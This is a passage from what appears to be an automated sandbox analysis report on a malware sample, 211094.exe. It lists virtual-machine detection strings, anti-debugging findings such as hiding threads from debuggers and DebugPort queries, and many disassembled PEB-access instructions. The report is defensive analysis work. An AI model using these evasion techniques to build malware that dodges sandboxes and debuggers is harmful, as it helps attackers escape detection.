      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: 211094.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000006.00000000.380788568.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000006.00000000.380969821.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 00000006.00000002.600452519.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: explorer.exe, 00000006.00000002.588091491.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Users\user\Desktop\211094.exeProcess information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022904A2 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,02294B9A
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\211094.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\211094.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291627 rdtsc
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02293349 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291627 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291F39 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02294B44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291F91 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291F97 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02294FE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02291FCD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_022957C5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 0_2_02292D95 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E518E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E59FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E528EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E59FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5136CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5116E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5646A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5237F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E507D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E523D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E563540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E593D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E56A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E566DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E598DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E511DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5135A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E574257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E52927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E59B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E59B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E503A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E524A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E524A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E513B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E513B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4EDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E50DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E512397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E59D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E514BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E500050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E500050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5A2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E567016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E5B4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E51002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E57B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exe Code function: 4_2_1E4E40E1 mov eax, dword ptr fs:[00000030h]
